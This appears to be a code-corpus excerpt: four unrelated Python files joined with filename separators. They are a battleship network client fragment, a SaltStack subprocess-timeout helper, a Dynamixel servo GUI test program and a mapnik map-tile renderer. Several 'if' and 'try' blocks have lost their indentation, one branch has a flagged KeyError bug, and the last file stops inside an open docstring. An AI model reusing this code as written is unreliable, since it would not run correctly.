					elif status == 29 or status == 38:  # Successful_Ship_Placement or Illegal_Ship_Placement
						self.__backend.onPlaceShips(status == 29)
					elif status == 37:  # Illegal_Game_Definition
						self.__backend.onIllegalGameDefinition()
					elif status == 48:  # Game_Preparation_Ended
						self.__backend.gamePreparationsEndedResponse()
					# game play updates: Begin_Turn, Successful_/Illegal_
					# moves and attacks, Not_Your_Turn, ...
					elif status in (11, 21, 22, 23, 24, 31, 32, 33, 34, 39, 41):
						self.__backend.onGamePlayUpdate(status)
					elif status == 18:  # Begin_Ship_Placing
						self.__backend.onBeginShipPlacing()
					# field updates
					elif status == 13:  # Update_Own_Field
						self.__backend.onUpdateOwnFields(params)
					elif status == 14:  # Update_Enemy_Field
						self.__backend.onUpdateEnemyFields(params)
					# bad error stuff: Message_Not_Recognized, Not_In_Any_Game
					elif status == 40 or status == 43:
						self.__backend.errorResponse(status)
				else:
					logging.debug("%s received with unknown status code." % (messageType))
			except Exception as ex:
				import traceback
				traceback.print_exc(file=sys.stdout)
				logging.error("Connection error: %s" % ex)
				logging.error("Lost connection to server! Cleaning up...")
				#self.__backend.onLostConnection()

	def __sendMessage(self, type, params):
		"""
		Encodes and sends one message; logs instead of raising on failure.

		Args:
			type: the message type understood by MessageParser
			params: dict of message parameters
		"""
		if not self.__connected:
			logging.error("Not connected.")
			return

		msg = self.__messageParser.encode(type, params)
		logging.debug("Sending message: %s" % (msg))
		try:
			# sendall retries until the whole message is written
			# (plain send() may write only part of the buffer)
			self.__sock.sendall(msg)
		except Exception as ex:
			logging.error("Failed to send message: %s" % ex)
			logging.error("Lost connection to server! Cleaning up...")
			#self.__backend.onLostConnection()

	def close(self):
		"""
		Closes the connection to the server.

		Only flags the receive loop to stop; the loop exits after the next
		recv() returns.
		"""
		self.__stopReceiveLoop = True

	def isConnected(self):
		"""
		Returns True if the client is connected to a server or False if not.

		Returns: True if the client is connected to a server or False if not.
		"""
		return self.__connected

	def disconnect(self):
		"""
		Disconnects from the server the client is currently connected to.
		"""
		self.__stopReceiveLoop = True
		self.leaveGame()
		try:
			self.__sock.close()
			logging.info("Disconnected")
		except OSError:
			logging.error("Disconnecting failed!")
		self.__connected = False

	def connect(self, hostname, port):
		"""
		Connects to a server and starts the background receive loop.

		Args:
			hostname: the hostname or IP address of the server
			port: the port of the server

		Returns: True on success, False on failure.
		"""
		try:
			self.__sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			self.__sock.connect((hostname, port))
			self.__connected = True
			self.__stopReceiveLoop = False
			Thread(target=self.__receiveLoop).start()
			logging.info("Connected to '%s:%s'" % (hostname, port))
			return True
		except OSError:
			logging.error("Failed to connect to server.")
			return False

	def __init__(self, backend):
		"""
		Args:
			backend: the backend object that receives all decoded reports
		"""
		self.__backend = backend
		self.__messageParser = MessageParser()
		self.__connected = False
|
timed_subprocess.py
|
# -*- coding: utf-8 -*-
'''
For running command line executables with a timeout
'''
from __future__ import absolute_import, print_function, unicode_literals
import shlex
import subprocess
import threading
import salt.exceptions
import salt.utils.data
from salt.ext import six
class TimedProc(object):
    '''
    Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs

    Attributes set by __init__:
        process  - the underlying subprocess.Popen object
        command  - the (possibly normalized) args actually executed
        stdout/stderr - populated by run() when with_communicate is True
    '''
    def __init__(self, args, **kwargs):
        # 'bg' means fire-and-forget: don't wait and don't capture anything
        self.wait = not kwargs.pop('bg', False)
        self.stdin = kwargs.pop('stdin', None)
        self.with_communicate = kwargs.pop('with_communicate', self.wait)
        self.timeout = kwargs.pop('timeout', None)
        self.stdin_raw_newlines = kwargs.pop('stdin_raw_newlines', False)

        # If you're not willing to wait for the process
        # you can't define any stdin, stdout or stderr
        if not self.wait:
            self.stdin = kwargs['stdin'] = None
            self.with_communicate = False
        elif self.stdin is not None:
            if not self.stdin_raw_newlines:
                # Translate a newline submitted as '\n' on the CLI to an actual
                # newline character.
                self.stdin = self.stdin.replace('\\n', '\n').encode(__salt_system_encoding__)
            kwargs['stdin'] = subprocess.PIPE

        if not self.with_communicate:
            self.stdout = kwargs['stdout'] = None
            self.stderr = kwargs['stderr'] = None

        if self.timeout and not isinstance(self.timeout, (int, float)):
            raise salt.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))

        try:
            self.process = subprocess.Popen(args, **kwargs)
        except (AttributeError, TypeError):
            # Popen rejected the args; normalize them to strings and retry once
            if not kwargs.get('shell', False):
                if not isinstance(args, (list, tuple)):
                    try:
                        args = shlex.split(args)
                    except AttributeError:
                        args = shlex.split(six.text_type(args))
                str_args = []
                for arg in args:
                    if not isinstance(arg, six.string_types):
                        str_args.append(six.text_type(arg))
                    else:
                        str_args.append(arg)
                args = str_args
            else:
                if not isinstance(args, (list, tuple, six.string_types)):
                    # Handle corner case where someone does a 'cmd.run 3'
                    args = six.text_type(args)
            # Ensure that environment variables are strings
            for key, val in six.iteritems(kwargs.get('env', {})):
                if not isinstance(val, six.string_types):
                    kwargs['env'][key] = six.text_type(val)
                if not isinstance(key, six.string_types):
                    kwargs['env'][six.text_type(key)] = kwargs['env'].pop(key)
            if six.PY2 and 'env' in kwargs:
                # Ensure no unicode in custom env dict, as it can cause
                # problems with subprocess.
                kwargs['env'] = salt.utils.data.encode_dict(kwargs['env'])
            args = salt.utils.data.decode(args)
            self.process = subprocess.Popen(args, **kwargs)
        self.command = args

    def run(self):
        '''
        wait for subprocess to terminate and return subprocess' return code.
        If timeout is reached, throw TimedProcTimeoutError
        '''
        def receive():
            # collect output / wait, depending on how we were configured
            if self.with_communicate:
                self.stdout, self.stderr = self.process.communicate(input=self.stdin)
            elif self.wait:
                self.process.wait()

        if not self.timeout:
            receive()
        else:
            rt = threading.Thread(target=receive)
            rt.start()
            rt.join(self.timeout)
            # NOTE: Thread.isAlive() was removed in Python 3.9;
            # is_alive() has been available since Python 2.6.
            if rt.is_alive():
                # Subprocess cleanup (best effort)
                self.process.kill()

                def terminate():
                    # escalate if the process survived kill()
                    if rt.is_alive():
                        self.process.terminate()
                threading.Timer(10, terminate).start()
                raise salt.exceptions.TimedProcTimeoutError(
                    '{0} : Timed out after {1} seconds'.format(
                        self.command,
                        six.text_type(self.timeout),
                    )
                )
        return self.process.returncode
|
test_program_for_Dynamixel_Protocol2_Xseries_ReubenPython2and3Class.py
|
# -*- coding: utf-8 -*-
'''
Reuben Brewer, reuben.brewer@gmail.com, www.reubotics.com
Apache 2 License
Software Revision C, 05/28/2021
Verified working on: Python 2.7 and 3.7 for Windows 8.1 64-bit and Raspberry Pi Buster (no Mac testing yet).
'''
__author__ = 'reuben.brewer'
from Dynamixel_Protocol2_Xseries_ReubenPython2and3Class import *
from MyPrintReubenPython2and3Class import *
import os, sys, platform
import time, datetime
import threading
import collections
import traceback
###############
if sys.version_info[0] < 3:
from Tkinter import * #Python 2
import tkFont
import ttk
else:
from tkinter import * #Python 3
import tkinter.font as tkFont #Python 3
from tkinter import ttk
###############
###############
if sys.version_info[0] < 3:
from builtins import raw_input as input
else:
from future.builtins import input as input #"sudo pip3 install future" (Python 3) AND "sudo pip install future" (Python 2)
###############
##########################################################################################################
##########################################################################################################
def getPreciseSecondsTimeStampString():
    # Despite the name, this returns the raw epoch time as a float
    # (seconds since the Unix epoch), not a formatted string.
    return time.time()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TestButtonResponse():
    global MyPrintReubenPython2and3ClassObject
    global USE_MYPRINT_FLAG

    # Route the notification through the MyPrint object when it is enabled;
    # otherwise fall back to the plain console.
    message = "Test Button was Pressed!"
    if USE_MYPRINT_FLAG == 1:
        MyPrintReubenPython2and3ClassObject.my_print(message)
    else:
        print(message)
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_update_clock():
    global root
    global EXIT_PROGRAM_FLAG
    global GUI_RootAfterCallbackInterval_Milliseconds
    global USE_GUI_FLAG

    global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject
    global DYNAMIXEL_X_OPEN_FLAG
    global SHOW_IN_GUI_DYNAMIXEL_X_FLAG

    global MyPrintReubenPython2and3ClassObject
    global MYPRINT_OPEN_FLAG
    global SHOW_IN_GUI_MYPRINT_FLAG

    if USE_GUI_FLAG == 1 and EXIT_PROGRAM_FLAG == 0:
        # Give each open, GUI-enabled subobject a chance to redraw its widgets.
        if DYNAMIXEL_X_OPEN_FLAG == 1 and SHOW_IN_GUI_DYNAMIXEL_X_FLAG == 1:
            Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.GUI_update_clock()

        if MYPRINT_OPEN_FLAG == 1 and SHOW_IN_GUI_MYPRINT_FLAG == 1:
            MyPrintReubenPython2and3ClassObject.GUI_update_clock()

        # Re-arm this callback so it keeps firing on the Tk event loop.
        root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
#########################################################
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ExitProgram_Callback():
    global root
    global EXIT_PROGRAM_FLAG
    global GUI_RootAfterCallbackInterval_Milliseconds

    global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject
    global DYNAMIXEL_X_OPEN_FLAG

    global MyPrintReubenPython2and3ClassObject
    global MYPRINT_OPEN_FLAG

    print("Exiting all threads in test_program_for_MyPrintReubenPython2and3Class.")

    # Signal every polling loop (including the __main__ loop) to stop.
    EXIT_PROGRAM_FLAG = 1

    # Ask each successfully-opened subobject to shut down its own threads.
    if DYNAMIXEL_X_OPEN_FLAG == 1:
        Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.ExitProgram_Callback()

    if MYPRINT_OPEN_FLAG == 1:
        MyPrintReubenPython2and3ClassObject.ExitProgram_Callback()

    root.quit()     # Stop the GUI event loop
    root.destroy()  # Tear down the GUI window
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_Thread():
    global root
    global GUI_RootAfterCallbackInterval_Milliseconds

    # The Tk root must be created inside this thread so that all subsequent
    # widget work happens on the GUI thread.
    root = Tk()

    test_button = Button(root, text='Test Button', state="normal", width=20, command=lambda i=1: TestButtonResponse())
    test_button.grid(row=0, column=0, padx=5, pady=1)

    # Route window-close events through the common exit path.
    root.protocol("WM_DELETE_WINDOW", ExitProgram_Callback)

    # Kick off the periodic refresh, then hand control to Tk.
    root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
    root.mainloop()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
if __name__ == '__main__':

    #################################################
    # NOTE: `global` statements at module scope are no-ops; they are kept
    # here to mirror the declarations inside the callbacks above.
    global my_platform

    # Coarse OS/platform label (only used for the printout below).
    if platform.system() == "Linux":
        if "raspberrypi" in platform.uname(): # os.uname() doesn't work in windows
            # NOTE(review): tuple membership only matches a uname() field that
            # is exactly "raspberrypi" (no substring match) -- confirm on the Pi.
            my_platform = "pi"
        else:
            my_platform = "linux"
    elif platform.system() == "Windows":
        my_platform = "windows"
    elif platform.system() == "Darwin":
        my_platform = "mac"
    else:
        my_platform = "other"

    print("The OS platform is: " + my_platform)
    #################################################

    #################################################
    # Master on/off switches for each subsystem.
    global USE_GUI_FLAG
    USE_GUI_FLAG = 1

    global USE_DYNAMIXEL_X_FLAG
    USE_DYNAMIXEL_X_FLAG = 1

    global USE_MYPRINT_FLAG
    USE_MYPRINT_FLAG = 1
    #################################################

    #################################################
    # Whether each subsystem draws its widgets inside the shared GUI.
    global SHOW_IN_GUI_DYNAMIXEL_X_FLAG
    SHOW_IN_GUI_DYNAMIXEL_X_FLAG = 1

    global SHOW_IN_GUI_MYPRINT_FLAG
    SHOW_IN_GUI_MYPRINT_FLAG = 1
    #################################################

    #################################################
    # Tkinter grid() placement parameters for the Dynamixel frame.
    global GUI_ROW_DYNAMIXEL_X
    global GUI_COLUMN_DYNAMIXEL_X
    global GUI_PADX_DYNAMIXEL_X
    global GUI_PADY_DYNAMIXEL_X
    global GUI_ROWSPAN_DYNAMIXEL_X
    global GUI_COLUMNSPAN_DYNAMIXEL_X
    GUI_ROW_DYNAMIXEL_X = 0
    GUI_COLUMN_DYNAMIXEL_X = 0
    GUI_PADX_DYNAMIXEL_X = 1
    GUI_PADY_DYNAMIXEL_X = 10
    GUI_ROWSPAN_DYNAMIXEL_X = 1
    GUI_COLUMNSPAN_DYNAMIXEL_X = 1

    # Tkinter grid() placement parameters for the MyPrint frame.
    global GUI_ROW_MYPRINT
    global GUI_COLUMN_MYPRINT
    global GUI_PADX_MYPRINT
    global GUI_PADY_MYPRINT
    global GUI_ROWSPAN_MYPRINT
    global GUI_COLUMNSPAN_MYPRINT
    GUI_ROW_MYPRINT = 1
    GUI_COLUMN_MYPRINT = 0
    GUI_PADX_MYPRINT = 1
    GUI_PADY_MYPRINT = 10
    GUI_ROWSPAN_MYPRINT = 1
    GUI_COLUMNSPAN_MYPRINT = 1
    #################################################

    #################################################
    # Shared state: exit flag, Tk root handle, and -1 / -11111 sentinels
    # meaning "not yet set".
    global EXIT_PROGRAM_FLAG
    EXIT_PROGRAM_FLAG = 0

    global root

    global GUI_RootAfterCallbackInterval_Milliseconds
    GUI_RootAfterCallbackInterval_Milliseconds = 30

    global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject
    global DYNAMIXEL_X_OPEN_FLAG
    DYNAMIXEL_X_OPEN_FLAG = -1

    global MyPrintReubenPython2and3ClassObject
    global MYPRINT_OPEN_FLAG
    MYPRINT_OPEN_FLAG = -1

    global MainLoopThread_current_time
    MainLoopThread_current_time = -11111

    global MainLoopThread_starting_time
    MainLoopThread_starting_time = -11111
    #################################################

    ################################################# KEY GUI LINE
    if USE_GUI_FLAG == 1:
        print("Starting GUI thread...")
        GUI_Thread_ThreadingObject = threading.Thread(target=GUI_Thread)
        # NOTE(review): Thread.setDaemon() is deprecated (prefer .daemon = True);
        # daemon=True means the GUI thread dies with the main thread.
        GUI_Thread_ThreadingObject.setDaemon(True)
        GUI_Thread_ThreadingObject.start()
        time.sleep(0.5) # Allow enough time for 'root' to be created so that we can then pass it into the other classes.
    else:
        root = None
    #################################################

    #################################################
    # Most-recent-message bookkeeping for the Dynamixel object; -11111.0 and
    # "" are "nothing received yet" sentinels.
    global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict

    global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageCounter
    Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageCounter = -11111.0

    global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTimeSeconds
    Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTimeSeconds = -11111.0

    global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTopic
    Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTopic = ""

    global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageData
    Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageData = ""

    # GUI-placement parameters handed to the Dynamixel class.
    DYNAMIXEL_X_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_DYNAMIXEL_X_FLAG),
                                          ("root", root),
                                          ("EnableInternal_MyPrint_Flag", 1),
                                          ("NumberOfPrintLines", 10),
                                          ("UseBorderAroundThisGuiObjectFlag", 0),
                                          ("GUI_ROW", GUI_ROW_DYNAMIXEL_X),
                                          ("GUI_COLUMN", GUI_COLUMN_DYNAMIXEL_X),
                                          ("GUI_PADX", GUI_PADX_DYNAMIXEL_X),
                                          ("GUI_PADY", GUI_PADY_DYNAMIXEL_X),
                                          ("GUI_ROWSPAN", GUI_ROWSPAN_DYNAMIXEL_X),
                                          ("GUI_COLUMNSPAN", GUI_COLUMNSPAN_DYNAMIXEL_X)])

    # Hardware setup parameters: U2D2 serial number, baud rate, and the
    # per-motor lists (one element per attached motor).
    DYNAMIXEL_X_setup_dict = dict([("SerialNumber", "FT3M9STOA"), #AlexB = FT2GXC48A
                                   ("NameForU2D2UserProvided", "Example Name U2D2"),
                                   ("SerialBaudRate", 4000000),
                                   ("ENABLE_GETS", 1),
                                   ("ENABLE_SETS", 1),
                                   ("MainThread_TimeToSleepEachLoop", 0.001),
                                   ("MotorType_StringList", ["XM540-W270-R"]),
                                   ("ControlType_StartingValueList", ["CurrentBasedPositionControl"]),
                                   ("Position_Deg_StartingValueList", [180.0]),
                                   ("Position_Deg_min", [0.0]),
                                   ("Position_Deg_max", [360.0]),
                                   ("Current_Percent0to1_max", [0.3]),
                                   ("StartEngagedFlag", [1]),
                                   ("GUIparametersDict", DYNAMIXEL_X_GUIparametersDict)])
                                   #("RxThread_TimeToSleepEachLoop", 0.001),
                                   #("TxThread_TimeToSleepEachLoop", 0.001),
                                   #("MQTT_RxMessage_Queue_MaxSize", 1000),
                                   #("MQTT_TxMessage_Queue_MaxSize", 1000)])

    if USE_DYNAMIXEL_X_FLAG == 1:
        try:
            # OBJECT_CREATED_SUCCESSFULLY_FLAG becomes the open flag (1 = ok).
            Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject = Dynamixel_Protocol2_Xseries_ReubenPython2and3Class(DYNAMIXEL_X_setup_dict)
            time.sleep(0.25)
            DYNAMIXEL_X_OPEN_FLAG = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
        except:
            # NOTE(review): `traceback` is not imported directly by this file;
            # it appears to rely on the star-imports at the top -- confirm.
            exceptions = sys.exc_info()[0]
            print("Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject, exceptions: %s" % exceptions)
            traceback.print_exc()
    #################################################

    #################################################
    if USE_MYPRINT_FLAG == 1:
        MyPrintReubenPython2and3ClassObject_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_MYPRINT_FLAG),
                                                                      ("root", root),
                                                                      ("UseBorderAroundThisGuiObjectFlag", 0),
                                                                      ("GUI_ROW", GUI_ROW_MYPRINT),
                                                                      ("GUI_COLUMN", GUI_COLUMN_MYPRINT),
                                                                      ("GUI_PADX", GUI_PADX_MYPRINT),
                                                                      ("GUI_PADY", GUI_PADY_MYPRINT),
                                                                      ("GUI_ROWSPAN", GUI_ROWSPAN_MYPRINT),
                                                                      ("GUI_COLUMNSPAN", GUI_COLUMNSPAN_MYPRINT)])

        MyPrintReubenPython2and3ClassObject_setup_dict = dict([("NumberOfPrintLines", 10),
                                                               ("WidthOfPrintingLabel", 200),
                                                               ("PrintToConsoleFlag", 1),
                                                               ("LogFileNameFullPath", os.getcwd() + "//TestLog.txt"),
                                                               ("GUIparametersDict", MyPrintReubenPython2and3ClassObject_GUIparametersDict)])
        try:
            MyPrintReubenPython2and3ClassObject = MyPrintReubenPython2and3Class(MyPrintReubenPython2and3ClassObject_setup_dict)
            time.sleep(0.25)
            MYPRINT_OPEN_FLAG = MyPrintReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
        except:
            exceptions = sys.exc_info()[0]
            print("MyPrintReubenPython2and3ClassObject __init__: Exceptions: %s" % exceptions)
            traceback.print_exc()
    #################################################

    #################################################
    # Abort (after a keypress, so the console stays readable) if a requested
    # subsystem failed to open.
    if USE_MYPRINT_FLAG == 1 and MYPRINT_OPEN_FLAG != 1:
        print("Failed to open MyPrintReubenPython2and3ClassObject.")
        input("Press any key (and enter) to exit.")
        sys.exit()
    #################################################

    #################################################
    if USE_DYNAMIXEL_X_FLAG == 1 and DYNAMIXEL_X_OPEN_FLAG != 1:
        print("Failed to open Dynamixel_Protocol2_Xseries_ReubenPython2and3Class.")
        input("Press any key (and enter) to exit.")
        sys.exit()
    #################################################

    #################################################
    print("Starting main loop 'test_program_for_Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_WoVa.")
    MainLoopThread_starting_time = getPreciseSecondsTimeStampString()

    # Poll loop: runs until ExitProgram_Callback() sets EXIT_PROGRAM_FLAG.
    while(EXIT_PROGRAM_FLAG == 0):

        MainLoopThread_current_time = getPreciseSecondsTimeStampString() - MainLoopThread_starting_time

        if USE_DYNAMIXEL_X_FLAG == 1:
            Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.GetMostRecentDataDict()

            if "RxMessageCounter" in Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict:
                print("Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict: " + str(Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict))
                Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageCounter = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict["RxMessageCounter"]
                Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTimeSeconds = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict["RxMessageTimeSeconds"]
                Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTopic = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict["RxMessageTopic"]
                Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageData = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict["RxMessageData"]

                if Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageData.lower() == "ping":
                    # NOTE(review): DYNAMIXEL_X_setup_dict above defines neither
                    # "MQTT_Tx_topic_list" nor "MQTT_Tx_QOS_list" (they are only
                    # present as commented-out lines), so this branch would raise
                    # KeyError if it ever ran -- looks copied from an MQTT test
                    # program; confirm intent.
                    Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.AddDataToBeSent(DYNAMIXEL_X_setup_dict["MQTT_Tx_topic_list"][0], "Received your message!", DYNAMIXEL_X_setup_dict["MQTT_Tx_QOS_list"][0])
            else:
                # Nothing new: brief sleep keeps the poll loop from spinning.
                time.sleep(0.005)

    #################################################
    print("Exiting main program 'test_program_for_Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_WoVa.")
##########################################################################################################
##########################################################################################################
|
generate_tiles.py
|
#!/usr/bin/env python
#Source: https://trac.openstreetmap.org/browser/subversion/applications/rendering/mapnik/generate_tiles.py
from math import pi,cos,sin,log,exp,atan
from subprocess import call
import sys, os
from Queue import Queue
import threading
try:
import mapnik2 as mapnik
except:
import mapnik
DEG_TO_RAD = pi/180
RAD_TO_DEG = 180/pi
# Default number of rendering threads to spawn, should be roughly equal to number of CPU cores available
NUM_THREADS = 4
def minmax(a, b, c):
    """Clamp *a* into the closed interval [b, c]."""
    return min(max(a, b), c)
class GoogleProjection:
    """Converter between lon/lat (EPSG:4326) and spherical-mercator tile
    pixel coordinates, using per-zoom lookup tables built once up front."""

    def __init__(self, levels=18):
        # Per-zoom constants: Bc = pixels per degree of longitude,
        # Cc = pixels per radian, zc = pixel centre of the map,
        # Ac = total map width in pixels.
        self.Bc = []
        self.Cc = []
        self.zc = []
        self.Ac = []
        size = 256
        for _ in range(0, levels):
            half = size / 2
            self.Bc.append(size / 360.0)
            self.Cc.append(size / (2 * pi))
            self.zc.append((half, half))
            self.Ac.append(size)
            size *= 2

    def fromLLtoPixel(self, ll, zoom):
        """Project (lon, lat) degrees -> (pixel_x, pixel_y) at *zoom*."""
        centre = self.zc[zoom]
        px = round(centre[0] + ll[0] * self.Bc[zoom])
        # Clamp sin(lat) away from the poles to keep the log() finite.
        f = minmax(sin(DEG_TO_RAD * ll[1]), -0.9999, 0.9999)
        py = round(centre[1] + 0.5 * log((1 + f) / (1 - f)) * -self.Cc[zoom])
        return (px, py)

    def fromPixelToLL(self, px, zoom):
        """Inverse projection: (pixel_x, pixel_y) -> (lon, lat) degrees."""
        centre = self.zc[zoom]
        lon = (px[0] - centre[0]) / self.Bc[zoom]
        merc_y = (px[1] - centre[1]) / -self.Cc[zoom]
        lat = RAD_TO_DEG * (2 * atan(exp(merc_y)) - 0.5 * pi)
        return (lon, lat)
class RenderThread:
    """Worker whose loop() pulls tile jobs from a shared queue and renders
    each one to a PNG with mapnik, until a None sentinel arrives."""

    def __init__(self, tile_dir, map_obj, q, printLock, maxZoom):
        self.tile_dir = tile_dir
        self.q = q
        self.m = map_obj
        self.printLock = printLock
        # Obtain <Map> projection
        self.prj = mapnik.Projection(self.m.srs)
        # Projects between tile pixel co-ordinates and LatLong (EPSG:4326)
        self.tileproj = GoogleProjection(maxZoom+1)

    def render_tile(self, tile_uri, x, y, z):
        """Render the single 256x256 tile (x, y) at zoom z into tile_uri."""
        # Calculate pixel positions of bottom-left & top-right
        p0 = (x * 256, (y + 1) * 256)
        p1 = ((x + 1) * 256, y * 256)

        # Convert to LatLong (EPSG:4326)
        l0 = self.tileproj.fromPixelToLL(p0, z);
        l1 = self.tileproj.fromPixelToLL(p1, z);

        # Convert to map projection (e.g. mercator co-ords EPSG:900913)
        c0 = self.prj.forward(mapnik.Coord(l0[0],l0[1]))
        c1 = self.prj.forward(mapnik.Coord(l1[0],l1[1]))

        # Bounding box for the tile
        # (mapnik renamed Envelope to Box2d as of API version 800)
        if hasattr(mapnik,'mapnik_version') and mapnik.mapnik_version() >= 800:
            bbox = mapnik.Box2d(c0.x,c0.y, c1.x,c1.y)
        else:
            bbox = mapnik.Envelope(c0.x,c0.y, c1.x,c1.y)
        render_size = 256
        self.m.resize(render_size, render_size)
        self.m.zoom_to_box(bbox)
        # A render buffer lets features spilling over tile edges draw correctly.
        if(self.m.buffer_size < 128):
            self.m.buffer_size = 128

        # Render image with default Agg renderer
        im = mapnik.Image(render_size, render_size)
        mapnik.render(self.m, im)
        im.save(tile_uri, 'png256')

    def loop(self):
        """Consume the queue forever; skip tiles already on disk; a None
        job is the shutdown sentinel."""
        while True:
            # Fetch a tile from the queue and render it
            r = self.q.get()
            if (r == None):
                self.q.task_done()
                break
            else:
                (name, tile_uri, x, y, z) = r

            exists= ""
            if os.path.isfile(tile_uri):
                exists= "exists"
            else:
                self.render_tile(tile_uri, x, y, z)
            # A 103-byte file is flagged as an "Empty Tile" in the log output.
            # NOTE(review): that constant is style/version dependent -- confirm.
            bytes=os.stat(tile_uri)[6]
            empty= ''
            if bytes == 103:
                empty = " Empty Tile "
            # Serialise console output across render threads.
            self.printLock.acquire()
            print name, ":", z, x, y, exists, empty
            self.printLock.release()
            self.q.task_done()
def render_tiles(bbox, map_obj, tile_dir, minZoom=1,maxZoom=18, name="unknown", num_threads=NUM_THREADS, tms_scheme=False):
    """Render every tile covering *bbox* for zooms minZoom..maxZoom into
    tile_dir/<z>/<x>/<y>.png using num_threads worker threads.

    bbox is (min_lon, min_lat, max_lon, max_lat) in degrees. With
    tms_scheme=True the y index is flipped to match the OSGeo TMS spec.
    """
    print "render_tiles(",bbox, map_obj, tile_dir, minZoom,maxZoom, name,")"

    # Launch rendering threads
    # NOTE(review): every RenderThread shares the same map_obj instance;
    # verify the mapnik Map object is safe to use from multiple threads.
    queue = Queue(32)
    printLock = threading.Lock()
    renderers = {}
    for i in range(num_threads):
        renderer = RenderThread(tile_dir, map_obj, queue, printLock, maxZoom)
        render_thread = threading.Thread(target=renderer.loop)
        render_thread.start()
        #print "Started render thread %s" % render_thread.getName()
        renderers[i] = render_thread

    if not os.path.isdir(tile_dir):
        os.mkdir(tile_dir)

    gprj = GoogleProjection(maxZoom+1)

    # Top-left / bottom-right corners of the bounding box.
    ll0 = (bbox[0],bbox[3])
    ll1 = (bbox[2],bbox[1])

    for z in range(minZoom,maxZoom + 1):
        px0 = gprj.fromLLtoPixel(ll0,z)
        px1 = gprj.fromLLtoPixel(ll1,z)

        # check if we have directories in place
        zoom = "%s" % z
        if not os.path.isdir(tile_dir + zoom):
            os.mkdir(tile_dir + zoom)
        for x in range(int(px0[0]/256.0),int(px1[0]/256.0)+1):
            # Validate x co-ordinate
            if (x < 0) or (x >= 2**z):
                continue
            # check if we have directories in place
            str_x = "%s" % x
            if not os.path.isdir(tile_dir + zoom + '/' + str_x):
                os.mkdir(tile_dir + zoom + '/' + str_x)
            for y in range(int(px0[1]/256.0),int(px1[1]/256.0)+1):
                # Validate y co-ordinate
                if (y < 0) or (y >= 2**z):
                    continue
                # flip y to match OSGEO TMS spec
                if tms_scheme:
                    str_y = "%s" % ((2**z-1) - y)
                else:
                    str_y = "%s" % y
                tile_uri = tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'
                # Submit tile to be rendered into the queue
                t = (name, tile_uri, x, y, z)
                try:
                    queue.put(t)
                except KeyboardInterrupt:
                    raise SystemExit("Ctrl-c detected, exiting...")

    # Signal render threads to exit by sending empty request to queue
    for i in range(num_threads):
        queue.put(None)
    # wait for pending rendering jobs to complete
    queue.join()
    for i in range(num_threads):
        renderers[i].join()
"""
if __name__ == "__main__":
home = os.environ['HOME']
try:
mapfile = os.environ['MAPNIK_MAP_FILE']
except KeyError:
mapfile = home + "/svn.openstreetmap.org/applications/rendering/mapnik/osm-local.xml"
try:
tile_dir = os.environ['MAPNIK_TILE_DIR']
except KeyError:
tile_dir = home + "/osm/tiles/"
